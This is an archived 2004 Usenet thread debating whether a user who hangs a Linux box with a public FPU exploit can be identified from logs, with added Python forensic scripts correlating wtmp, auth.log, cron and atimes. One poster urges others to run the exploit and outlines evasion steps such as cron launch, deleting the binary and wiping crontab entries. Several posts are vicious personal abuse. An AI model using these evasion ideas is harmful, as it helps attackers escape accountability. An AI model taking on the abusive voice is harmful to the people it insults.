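UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8  # ut_type values from <utmp.h>

# The sshd "Accepted ..." line that auth.log records for a successful remote login.
AUTH_RE = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")


def _cstr(raw):
    """Decode a NUL-padded fixed-width C string field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_wtmp(data):
    """Return the records in a wtmp byte string, oldest first, as dicts."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                        "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9]})
    return records


def sessions(records):
    """Pair each login with its end: a DEAD_PROCESS on the same tty (clean logout),
    the next BOOT_TIME (the box went down with the session open; `last` prints
    "crash" for these), or None (still logged in)."""
    open_by_line, done = {}, []
    for r in records:
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            done.append((open_by_line.pop(r["line"]), r["time"], "logout"))
        elif r["type"] == BOOT_TIME:
            done.extend((login, r["time"], "crash") for login in open_by_line.values())
            open_by_line.clear()
    done.extend((login, None, "still logged in") for login in open_by_line.values())
    return done


def logged_in_at(records, t):
    """Logins whose session covered time t."""
    return [login for login, end, _ in sessions(records)
            if login["time"] <= t and (end is None or end > t)]


def remote_sources(auth_lines):
    """Map user -> set of source IPs seen in sshd 'Accepted' lines."""
    sources = {}
    for line in auth_lines:
        m = AUTH_RE.search(line)
        if m:
            sources.setdefault(m.group("user"), set()).add(m.group("ip"))
    return sources


def suspects(wtmp_bytes, auth_lines, crash_time):
    """Users logged in when the machine went down, with tty, origin host and any
    remote source IPs auth.log recorded for them."""
    srcs = remote_sources(auth_lines)
    return {login["user"]: {"line": login["line"], "host": login["host"],
                            "login": login["time"],
                            "sources": sorted(srcs.get(login["user"], ()))}
            for login in logged_in_at(parse_wtmp(wtmp_bytes), crash_time)}


# --- constructed sample data (not taken from any real system) ---------------------
def make_record(ut_type, pid, line, user, host, tv_sec):
    """Pack one utmp record; shorter strings are NUL-padded by struct."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)

CRASH_TIME = 1087606000  # assumed: last timestamp syslog flushed before the hang
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME, 0, "~", "reboot", "2.6.5-example", 1087600000),
    make_record(USER_PROCESS, 1201, "tty1", "alice", "", 1087603000),          # console
    make_record(USER_PROCESS, 1340, "pts/0", "bob", "192.0.2.23", 1087604000),  # via sshd
    make_record(DEAD_PROCESS, 1201, "tty1", "", "", 1087605000),                # alice logs out
    # no DEAD_PROCESS for pts/0: the box hung hard, the next record is the reboot
    make_record(BOOT_TIME, 0, "~", "reboot", "2.6.5-example", 1087606500),
    make_record(USER_PROCESS, 1150, "pts/0", "carol", "198.51.100.7", 1087607000),
])
SAMPLE_AUTH_LOG = [
    "Jun 19 15:20:00 host sshd[1340]: Accepted password for bob from 192.0.2.23 port 51322 ssh2",
    "Jun 19 16:10:00 host sshd[1150]: Accepted publickey for carol from 198.51.100.7 port 40111 ssh2",
]

if __name__ == "__main__":
    for user, info in suspects(SAMPLE_WTMP, SAMPLE_AUTH_LOG, CRASH_TIME).items():
        print(user, info)  # only bob: on pts/0 from 192.0.2.23 when the box went down
```

The point the two posts make is visible in the data: the login record for pts/0 was written to wtmp at login time, long before the hang, so nothing the crash discards afterwards removes it. `last -x` on the real file shows the same session with "crash" in place of a logout time; the script only adds the auth.log join so the source address comes out alongside the tty.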
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 08:34:12 +0000, Jim Richardson wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Sun, 20 Jun 2004 12:42:27 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
> nah, you just don't know how to read logs. Or what logs to read.
>
Okay wizard, why don't you actually prove me wrong. Crash a system from a
regular user account with the exploit code, and then simply post the
log entries that prove a particular user name caused the hang.
I know, you're too busy and important to be "troubled" with such
trivialities as actually backing up your claims that a hard system hang
can be traced to a single user account. I say it can't, and actually posted
system log entries spanning a hang/reboot.
You've just simply said I'm wrong without even providing a single
suggestion whatsoever of where this supposed tracking information DOES
exist. If you would simply do that one little tiny thing, then everyone,
even people who aren't sure who is correct in this case, could verify that
your claim is the correct one.
Otherwise it looks like you're just blowing smoke.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser localy.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
> Not the same thing. If the user has an account, he is hardly some unknown
> fool. His actions can be traced back to him quite easily
>
No they can't, once the exploit code executes, no log entries are made,
nothing is updated or saved, even the log entries that are waiting to be
flushed to disk are gone.
Time to put up or shut up Peter. I've already posted system log entries
showing that the system log shows no tractable information. You don't get
to just say I'm wrong or don't know what I'm doing. Either crash a system
with the exploit code, and post the log entries showing how the hang can
be traced to a particular user, or shut up.
| |
| T.G.Reaper 2004-06-26, 1:22 pm |
| On Mon, 21 Jun 2004 09:34:31 +0000, Peter Jensen wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> T.G.Reaper wrote:
>
>
> I'm guessing he'd examine the WTMP logs to find out who was logged in at
> the time of crash.
There could be lots of people logged in at any given time, that doesn't
narrow it down to an individual user.
> If it's a remote login, auth.log will also hold the
> username and IP address.
That doesn't specify that particular user caused the crash.
> Then he'd go over that users files and find
> the nasty in some directory he has write access to.
Owning a copy of exploit code is not illegal.
> Having the nasty
> executable owned by you is pretty hard evidence.
No it's not. It doesn't prove that any single person actually DID
something.
> Enough to get you
> kicked off the machine, at least.
Yeah, as long as you're willing to convict someone on vague circumstantial
evidence.
| |
| Peter Köhlmann 2004-06-26, 1:22 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are made,
> nothing is updated or saved, even the log entries that are waiting to be
> flushed to disk are gone.
>
> Time to put up or shut up Peter. I've already posted system log entries
> showing that the system log shows no tractable information. You don't get
> to just say I'm wrong or don't know what I'm doing. Either crash a system
> with the exploit code, and post the log entries showing how the hang can
> be traced to a particular user, or shut up.
>
You are really a retard. You know next to nothing about linux and then claim
this bullshit
And since when can you force me to do anything at all, you lying piece of
shit?
--
Never put off till tomorrow what you can avoid all together.
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:22 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are
> made,
Oh, really, you shitpacking submissive slut? So, the sysadmin will
not be able to see who last logged in or use tools such as system
accounting? There are dozens of easy methods available to track
every single user's activities, you obtuse sack of snot.
Here's an idea for you. Why don't you scour the net and look for
various system accounting tools and patches, install them all, and
try to defeat them one by one so you can come back and brag how
your Volunteer Exploit can propagate unleashed across the net and
devastate the Linux world, you obtuse shitpacking loser.
| |
| Jim Richardson 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 09:48:34 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 08:34:12 +0000, Jim Richardson wrote:
>
>
>
> Okay wizard, why don't you actually prove me wrong. crash a system from a
> regular user account with the exploit code, and then simply post the
> log entries that prove a particular user name caused the hang.
>
> I know, you're too busy and important to be "troubled" with such
> trivialities as actually backing up your claims that a hard system hang
> can be traced to single user account. I say it can't, and actually posted
> system log entries spanning a hang/reboot.
>
> You've just simply said I'm wrong without even providing a single
> suggestion whatsoever, of where this supposed tracking information DOES
> exist. If you would simply do that one little tiny thing, then everyone,
> even people who aren't sure who is correct in this case, could verify that
> your claim is the correct one.
>
> Otherwise it looks like you're just blowing smoke.
>
>
Nah, you just don't know where to look. Simple enough.
Find out when the system hung (hint: syslog will tell you that).
Now, check who was logged in (type lastlog at a shell); see who was
logged in at that time.
Now, if you have 10,000 folks logged in, you'll need to start getting
fancy. But for your machine, the one you claimed you couldn't tell who
did it, please post the relevant entries from above, and I'll probably
be able to tell you what username did it. If not, it will give clues for
the next step.
If you are looking for the big neon >I DID IT< flashing sign, you will
probably be disappointed.
(Oh, check the cron log too, and the crontabs of all users, in case the user
was timebombing it.)
Unless, of course, you're too busy and important.
--
Jim Richardson http://www.eskimo.com/~warlock
All life is a conjugation of the verb "to eat"
| |
| Jim Richardson 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 10:05:12 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 09:34:31 +0000, Peter Jensen wrote:
>
>
> There could be lots of people logged in at any given time, that doesn't
> narrow it down to an individual user.
>
It starts you in the right direction, and you can start looking for
executables; after all, since the machine hung, the evildoer(tm) didn't
have the chance to wipe the records.
>
> That doesn't specify that particular user caused the crash.
>
>
> Owning a copy of exploit code is not illegal.
>
Straw man, no one said it was. Peter simply pointed out that the
evildoer(tm) had to have read and exec perms on the given code. It's one
more footstep in the trail. Do you disagree? Do you know of a way that
the person could have deleted the malware after the machine hung.
>
> No it's not. It doesn't prove that any single person actually DID
> something.
>
No, but if there's only one copy available, and that account was logged
in, it is strong evidence of same, and is worth investigating further.
Do you disagree?
>
> Yeah, as long as you're willing to convict someone on vague circumstantial
> evidence.
>
Convict? this isn't a court of law, this is private property and
destruction of... Does this confuse you?
--
Jim Richardson http://www.eskimo.com/~warlock
As practiced by computer science, the study of programming is an unholy
mixture of mathematics, literary criticism, and folklore.
-- B. A. Sheil, 1981
| |
|
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 00:44:03 +0000, John wrote:
>
>
>
> Then compile and run it, you surely are invulnerable, what harm could it
> do, or are you not sure?
I did...see <1gGBc.8995$bs4.3777@newsread3.news.atl.earthlink.net>
>
> Since you're all patched up to date, then you should be invulnerable
> to the FPU exploit code, right?. I say your not.
>
> The only way to find out for sure is to compile and run the code. You can
> get it from here:
>
> http://linuxreviews.org/news/2004-0...rash/index.html
>
> If you're not willing to run a simple little test, the your pronouncements
> of how your all secure and invulnerable because of Linux's great bug
> fixing and package management will ring a little hollow.
>
> I'm not posting any binaries, I'm not asking for help in "OwNinG"
> anybodies system. I'm just saying if you aren't willing to test what you
> say is actually true, I don't particularly want to hear all your hot air
> about how great this or some other attribute of the OSS patch/update
> system is.
>
I tried it and got a bunch of "error:stray '\302' in program" messages. Oh,
and there was this one:
warning: use of memory input without lvalue in asm operand 0 is deprecated
| |
| Peter Jensen 2004-06-26, 1:22 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
T.G.Reaper wrote:
>
> There could be lots of people logged in at any given time, that
> doesn't narrow it down to an individual user.
No, but it does narrow it down to fewer than it otherwise would. This
is detective work we're talking about, so narrowing down the suspects is
obviously the first step. Sheesh, you're clueless about investigations.
Of course that was obvious from the log you chose to display in order to
show that there was supposedly no evidence ...
>
> That doesn't specify that particular user caused the crash.
Not in itself, no. However, if a user is logged on at the time of the
freeze, he owns the nasty binary, and that binary has an atime record of
just before the freeze, then it's more than enough evidence in my book.
I suspect it's also enough for the police. It's called placing the
suspect at the crime scene.
>
> Owning a copy of exploit code is not illegal.
If I found even source code for something that could in some way harm
the machine in the possession of some user, I would disable his account
immediately, pending an explanation. I'm entitled to do that, as it's
my property. I'm pretty sure every publicly accessible shell account
out there has similar TOS.
But you're right, I guess it's not illegal in the eyes of the law
enforcement. However, if I could also show that it's been *used*, then
it's an entirely different matter.
>
> No it's not. It doesn't prove that any single person actually DID
> something.
And if it's the only copy on the machine, and it has been accessed at
the time of the freeze, and the user in question was logged in, would
you still not say that's enough evidence? Be honest for a change, how
would *you* see it if it was *your* machine?
>
> Yeah, as long as you're willing to convict someone on vague
> circumstantial evidence.
There is nothing circumstantial about it. If a copy of the nasty was
shown to be accessed moments before a freeze, and it can be shown that
the owner was logged in, there is more than enough evidence. Both for
me, and probably for any law enforcement you'd like to involve. Not
that I see that happening. At most I'd imagine you'd get kicked off the
machine, fired (if you were stupid enough to do this at your place of
employment), and sued for any damages you caused.
--
PeKaJe
No problem is insoluble in all conceivable circumstances.
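The correlation Jim and Peter describe above, scripted as an added example (constructed sample data, not anything posted in this thread): take the hang window from syslog (last flushed entry up to the next boot banner), the sessions open across it from `last -F`, the cron CMD entries and file owners/atimes inside it, and rank users by how many independent records place them there. It also shows that a cron-launched job by a user who had already logged out still surfaces; only the hostname and kernel string are borrowed from the thread's `uname` output, every other name, address and timestamp is made up.

```python
"""Correlate syslog, `last -F` and file atimes around a hard hang.
Added example built on constructed sample data; the parsers assume the
classic Linux syslog, vixie-cron and `last -F` text formats."""
import re
from datetime import datetime, timedelta

YEAR = 2004                       # classic syslog lines carry no year
LOOKBACK = timedelta(minutes=10)  # syslog buffers: look a bit before its last entry

# Constructed /var/log/messages excerpt, ending at the reboot after the hang
SYSLOG = """\
Jun 21 16:44:58 SniFF sshd[2210]: Accepted password for bob from 10.0.0.7 port 51022 ssh2
Jun 21 16:46:01 SniFF cron[3010]: (root) CMD (run-parts /etc/cron.hourly)
Jun 21 16:47:02 SniFF cron[3021]: (mallory) CMD (/home/mallory/.cache/update)
Jun 21 16:47:15 SniFF su(pam_unix)[3030]: session opened for user root by reaper(uid=1000)
Jun 21 16:52:41 SniFF kernel: Linux version 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004
""".splitlines()

# Constructed `last -F` output; "crash" marks sessions wtmp never saw log out
LAST_F = """\
reaper   pts/0        :0               Mon Jun 21 16:20:11 2004 - crash                    (00:32)
bob      pts/1        10.0.0.7         Mon Jun 21 16:44:58 2004 - crash                    (00:07)
mallory  pts/2        10.0.0.9         Mon Jun 21 15:10:03 2004 - Mon Jun 21 15:31:44 2004 (00:21)
alice    pts/2        10.0.0.12        Mon Jun 21 09:02:17 2004 - Mon Jun 21 12:15:00 2004 (03:12)
reboot   system boot  2.6.5-Gentoo     Mon Jun 21 16:52:39 2004   still running
""".splitlines()

# Constructed (path, owner, atime) triples, as stat(1) would report under /home
FILES = [
    ("/home/mallory/.cache/update", "mallory", datetime(2004, 6, 21, 16, 47, 2)),
    ("/home/bob/notes.txt",         "bob",     datetime(2004, 6, 21, 16, 30, 0)),
    ("/home/alice/report.ods",      "alice",   datetime(2004, 6, 21, 11, 58, 0)),
]

SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (.*)$")
CRON_RE = re.compile(r"cron\[\d+\]: \((\w+)\) CMD \((.*)\)")
LAST_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4})\s+(.*)$")
LAST_END_RE = re.compile(r"- (\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4})")

def syslog_ts(text):
    return datetime.strptime(" ".join(text.split()), "%b %d %H:%M:%S").replace(year=YEAR)

def last_ts(text):
    return datetime.strptime(" ".join(text.split()), "%a %b %d %H:%M:%S %Y")

def hang_window(lines):
    """(last entry syslog flushed before the reboot, boot time): the hang is in between."""
    prev = None
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        when, msg = syslog_ts(m.group(1)), m.group(3)
        if msg.startswith("kernel: Linux version") and prev is not None:
            return prev, when           # first boot banner after earlier entries
        prev = when
    raise ValueError("no reboot banner found after a prior entry")

def sessions_open_at(last_lines, start, end):
    """Users whose wtmp session overlaps [start, end]; crash/still logged in = open."""
    users = set()
    for line in last_lines:
        m = LAST_RE.match(line)
        if not m or m.group(1) in ("reboot", "shutdown"):
            continue
        login, rest = last_ts(m.group(4)), m.group(5)
        e = LAST_END_RE.search(rest)
        logout = last_ts(e.group(1)) if e else None  # None: never logged out
        if login <= end and (logout is None or logout >= start):
            users.add(m.group(1))
    return sorted(users)

def cron_jobs_in(lines, start, end):
    """(user, command) for cron CMD entries stamped inside [start, end]."""
    jobs = []
    for line in lines:
        m, c = SYSLOG_RE.match(line), CRON_RE.search(line)
        if m and c and start <= syslog_ts(m.group(1)) <= end:
            jobs.append((c.group(1), c.group(2)))
    return jobs

def investigate(syslog, last_lines, files):
    """Rank users by independent records placing them at the hang."""
    last_entry, boot = hang_window(syslog)
    start = last_entry - LOOKBACK
    evidence = {}
    for user in sessions_open_at(last_lines, start, boot):
        evidence.setdefault(user, []).append("logged in when the system hung")
    for user, cmd in cron_jobs_in(syslog, start, boot):
        if user != "root":               # system jobs are noise here
            evidence.setdefault(user, []).append(f"cron ran {cmd} just before the hang")
    for path, owner, atime in files:
        if start <= atime <= boot:
            evidence.setdefault(owner, []).append(f"owns {path}, atime {atime:%H:%M:%S}")
    return sorted(evidence.items(), key=lambda kv: (-len(kv[1]), kv[0]))

if __name__ == "__main__":
    for user, why in investigate(SYSLOG, LAST_F, FILES):
        print(f"{user}: " + "; ".join(why))
```

On a live box the same three inputs come from `/var/log/messages`, `last -F` and `find /home -newer` plus `stat`; the point is that each source is a separate record the user cannot edit, so deleting the binary alone does not erase the trail.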
| |
| The Ghost In The Machine 2004-06-26, 1:23 pm |
| In comp.os.linux.advocacy, T.G.Reaper
<Reaper@127.0.0.1.Com>
wrote
on Mon, 21 Jun 2004 09:58:13 -0700
<pan.2004.06.21.16.58.11.830947@127.0.0.1.Com>:
> On Mon, 21 Jun 2004 09:37:19 +0200, Peter Köhlmann wrote:
>
>
>
> No they can't, once the exploit code executes, no log entries are made,
> nothing is updated or saved, even the log entries that are waiting to be
> flushed to disk are gone.
>
> Time to put up or shut up Peter. I've already posted system log entries
> showing that the system log shows no tractable information. You don't get
> to just say I'm wrong or don't know what I'm doing. Either crash a system
> with the exploit code, and post the log entries showing how the hang can
> be traced to a particular user, or shut up.
>
Some variants of syslog can throw records at another machine, and
accept records from another machine.
I'll leave it to you to deduce the obvious. :-)
--
#191, ewill3@earthlink.net
It's still legal to go .sigless.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 02:33:24 -0500, Sinister Midget wrote:
> On 2004-06-21, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> http://www.securityfocus.com/archive/1/264590
>
> http://securityresponse.symantec.co...32.korgo.l.html
>
> http://www.utexas.edu/its/alerts/sobig.html
>
> http://www.microsoft.com/technet/se...n/ms04-011.mspx
>
> That's enough. There are enough that this could go on for years and
> years.
>
> Yeah, some of those aren't so new. But I wanted to illustrate the
> problems aren't new either.
>
> So, which ones are "exaggerated half truths" and/or "meaningless
> generalities"? Are you going to claim to know more about WinDOS than
> MICROS~1? They have some (dis)honorable mentions there, too.
No, I'm not claiming to know more about Windows than Microsoft. I am
claiming to know more about Windows than you, or most other people for
that matter.
You can post all the references to advisories and anecdotal stories you
like. There are three Windows systems here in my apartment, and every one
of them is clean, secure, and stable. They have all been that way since the
first day they were brought up. Therefore it is not impossible to create
and maintain a safe, clean, reliable Windows system. I know, because I've
actually done it.
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> On Mon, 21 Jun 2004 02:33:24 -0500, Sinister Midget wrote:
>
>
>
> No, I'm not claiming to know more about Windows than Microsoft. I am
> claiming to know more about Windows than You, or most other people for
> that matter.
BWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAA
AHAHAHAHAHAHAHAHA
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAAAAAHH
AHAHAHAHAHAHAHA
HAHAHAHAHAHAHAHAHAHHAHA!!!!
You're nothing but a useless obtuse shitbag, the most ridiculed
individual on Usenet. You wouldn't know a fact if it hit you square
in the cunt. You are barely intelligible, let alone technically adept.
You don't know how to read, how to lie consistently, how to
comprehend, yet here you are making a complete cow-patty of
yourself. Let's just say you are quite skillful at making an obtuse
shit of yourself and embarrassing your poor wife who was dragged
into your world of shit hoping she would draw sympathy and deter
the condescending attitudes towards your limited intellect, if you
can call it that.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 18:34:15 +0000, Jim Richardson wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Mon, 21 Jun 2004 09:48:34 -0700,
> T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
>
>
> Nah, you just don't know where to look. Simple enough.
>
> Find out when system hung (hint, syslog will tell you that.)
I know.
> Now, check who was logged in (type lastlog at a shell) see who was
> logged in at that time.
> Now, if you have 10,000 folks logged in, you'll need to start getting
> fancy.
No shit. That was the point.
How many single user systems are going to be maliciously and deliberately
crashed by their own owner?
Do you really think that being able to determine who was logged on to a
system that has a single user is some type of great accomplishment?
> If you are looking for the big neon >I DID IT< flashing sign, you will
> probably be disappointed.
>
> (oh, check cronlog too, and the crontabs of all users. In case the user
> was timebombing it)
Good idea, I'm not enough of a hacker to have thought of that. Since the
disk image isn't needed once the code is loaded into memory, the exploit
could be modified to delete the executable before crashing the system. You
could also clean the crontab entry, but it wouldn't really be necessary.
Then how would you determine who the culprit was?
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Tue, 22 Jun 2004 00:00:15 +0000, The Ghost In The Machine wrote:
> Some variants of syslog can throw records at another machine, and
> accept records from another machine.
>
> I'll leave it to you to deduce the obvious. :-)
1. Very few systems log externally.
2. Many modern logging daemons frequently cache entries; if the system
hangs hard, it's not going to be throwing anything anywhere.
Your "solution" doesn't seem to do very much towards determining who
executed the bad code that hung the system.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 19:23:40 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
> You are really a retard. You know next to nothing about linux and then claim
> this bullshit
You're the one who can't provide a clear, coherent explanation of
how it would be possible to trace who executed a piece of exploit code to
hang a system that has a few dozen users.
You claim that it's bullshit, yet you can't even provide a single example
of how it could actually be done.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 18:34:19 +0000, Jim Richardson wrote:
> Straw man, no one said it was. Peter simply pointed out that the
> evildoer(tm) had to have read and exec perms on the given code. It's one
> more footstep in the trail. Do you disagree? Do you know of a way that
> the person could have deleted the malware after the machine hung.
No, but it could easily be done Before the system is hung, and
After the exploit code is loaded into memory.
>
> No, but if there's only one copy available,
Which was erased as soon as it was loaded into memory.
> and that account was logged
Which it's not because the exploit code was loaded and executed by cron.
> in, it is strong evidence of same, and is worth investigating further.
> Do you disagree?
Yes, see above.
>
>
>
> Convict? this isn't a court of law, this is private property and
> destruction of... Does this confuse you?
"Conviction" was used only in the context of determining guilt, does that
confuse you?
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> On Tue, 22 Jun 2004 00:00:15 +0000, The Ghost In The Machine wrote:
>
>
> 1. Very few systems log externally.
So, now you're an authority on public IT server configurations?
According to you, secure corporate IT servers and big-corp
server farms with public access configure themselves like
your XXXXing desktop, you XXXXing useless obtuse shitsack? Do
you know how XXXXing stupid you seem making such an idiotic,
ridiculous assertion, you obtuse snotXXXX?
>
> 2. Many Modern logging daemons frequently cache entries,
Are you madly XXXXed in the head? Did the wife push that
strapon too deep into your throat and XXXX your brain
into more obtuseness?
You have got to be the single most obtuse XXXXing shit
on the face of this Earth. It's a good thing your wife
isn't able to browse the net and read the Google
archives because she may realize what a XXXXing
moron loser to which she's ball-and-chained herself.
Poor Mrs. Reaper. Having to suffer the unbearable
intellectual embarrassment that is you.
| |
| T.G.Reaper 2004-06-26, 1:23 pm |
| On Mon, 21 Jun 2004 19:11:29 +0000, John wrote:
> T.G.Reaper wrote:
>
>
>
> I tried it and got a bunch of "error:stray '\302' in program" messages. Oh,
> and there was this one:
> warning: use of memory input without lvalue in asm operand 0 is deprecated
Look, I'm not giving some tutorial in programming 101. If you feed
gcc a clean file without extraneous characters, it WILL compile. If you
run it, it will probably hang your system. Personally I don't care if you
run it or not.
You can get a clean copy of the source from here:
http://linuxreviews.org/news/2004-0...index.html#toc6
I've posted a bunch of messages claiming that executing this
exploit code will hang nearly any Linux system. I find it interesting
that there have been exactly zero replies from ANYONE, claiming they've
compiled and run the executable. What's going on?
Everybody's saying I'm wrong, but I'm not seeing any replies saying I'm
wrong AND they've actually compiled and run the exploit
code....hmmm...wonder why that is?
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:23 pm |
| T.G.Reaper wrote:
> Look, I'm not giving some tutorial in programming 101.
Oh, that's a XXXXing riot. You're like a blind retarded goat
teaching a deaf mute dog the finer points of eating your
own feces.
| |
| Jim Richardson 2004-06-26, 1:24 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Mon, 21 Jun 2004 19:26:46 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Mon, 21 Jun 2004 18:34:15 +0000, Jim Richardson wrote:
>
>
> I know.
>
>
> No shit. That was the point.
>
> How many single user systems are going to be maliciously and deliberately
> crashed the by their owner owner?
>
> Do you really think that being able to determine who was logged on to a
> system that has a single user is some type of great accomplishment?
>
>
> Good idea, I'm not enough of a hacker to have thought of that. Since the
> disk image isn't needed once the code is loaded into memory, the exploit
> could be modified to delete the executable before crashing the system. You
> could also clean the crontab entry, but it wouldn't really be necessary.
>
> Then how would you determine who the culprit was?
>
Cleaning the crontab entry would leave traces in the cron log. Which
said user can't write to or delete.
--
Jim Richardson http://www.eskimo.com/~warlock
"We have to go forth and crush every world view that doesn't believe in
tolerance and free speech," - David Brin
| |
| T.G.Reaper 2004-06-26, 1:25 pm |
| On Tue, 22 Jun 2004 02:42:03 +0000, Sinister Midget wrote:
> You're trying to pass off your *3* machines as the norm.
No I'm not. I'm claiming that it is in fact possible to install and
maintain, a safe, clean, and reliable Windows system. Since that IS
possible, there is obviously nothing about the design or architecture of
Windows that makes it impossible.
> I gave you "cold hard facts" that you're trying to ignore with the use
> of your anecdotal evidence.
No, you gave me some tales of woe originating from people whose
experience, background, and skill level are not known. That doesn't say
anything about the quality or robustness of the OS.
| |
| T.G.Reaper 2004-06-26, 1:47 pm |
| On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
> Cleaning the crontab entry would leave traces in the cron log. Which
> said user can't write to or delete.
That's your whole case, a deleted cron entry?
You're going to fire or prosecute someone based on just that?
Remember, once loaded into memory the code could clean the crontab
entry, delete the executable, then wait for hours or days before actually
hanging the system.
Don't look now but the ability to track down and identify a user who
wants to crash almost any Linux system, seems to have just vanished.
| |
| Sinister Midget 2004-06-26, 1:47 pm |
| On 2004-06-22, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
>
>
> That's your whole case, a deleted cron entry?
And system logs. And timestamps on files (hint-hint).
> You're going to fire or prosecute someone based on just that?
No. System logs, timestamps on files (hint-hint), too.
> Remember, once loaded into memory the code could clean the crontab
> entry, delete the executable, then wait for hours or days before actually
> hanging the system.
It would nearly always require the user to stay logged in, or it would
require changes in something (hint-hint) that could be detected via
timestamps on files (hint-hint). Even more damning and easily found
would be a process started by a user who wasn't logged in at the time
of the occurrence of the problem itself. For me, that would actually
make it easier to trace.
> Don't look now but the ability to track down and identify a user who
> wants to crash almost any Linux system, seems to have just vanished.
Where'd it go? I still have mine here. What did you do with yours?
--
Microsoft: The company that made email dangerous.
| |
| Jim Richardson 2004-06-26, 1:48 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 22 Jun 2004 09:30:13 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Tue, 22 Jun 2004 08:34:18 +0000, Jim Richardson wrote:
>
>
>
> That's your whole case, a deleted cron entry?
>
> You're going to fire or prosecute someone based on just that?
>
Who's talking about prosecuting someone. I am talking about booting them
off the system.
I notice you haven't responded with the log entries I requested from
your "example" DoS, why is that? afraid I can actually tell you what
acct ran the malware?
> Remember, once loaded into memory the code could clean the crontab
> entry, delete the executable, then wait for hours or days before actually
> hanging the system.
>
except of course, that the system logs, are not writable by the normal
users. So sad, too bad.
> Don't look now but the ability to track down and identify a user who
> wants to crash almost any Linux system, seems to have just vanished.
>
and yet, you have failed to provide the log entries requested, what's
the matter, afraid of the result?
--
Jim Richardson http://www.eskimo.com/~warlock
"Illegal aliens have always been a problem in the United States.
Ask any Indian. "
--- Robert Orben
| |
| T.G.Reaper 2004-06-26, 1:48 pm |
| On Tue, 22 Jun 2004 17:42:16 +0000, Sinister Midget wrote:
> On 2004-06-22, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
>
> And system logs. And timestamps on files (hint-hint).
Timestamps on what files? The executable is deleted before the code crashes
the system, and the cron entry deletion could occur hours or days before
the exploit code actually causes the crash, so the timestamps on those logs
don't tell you anything.
>
> No. System logs, timestamps on files (hint-hint), too.
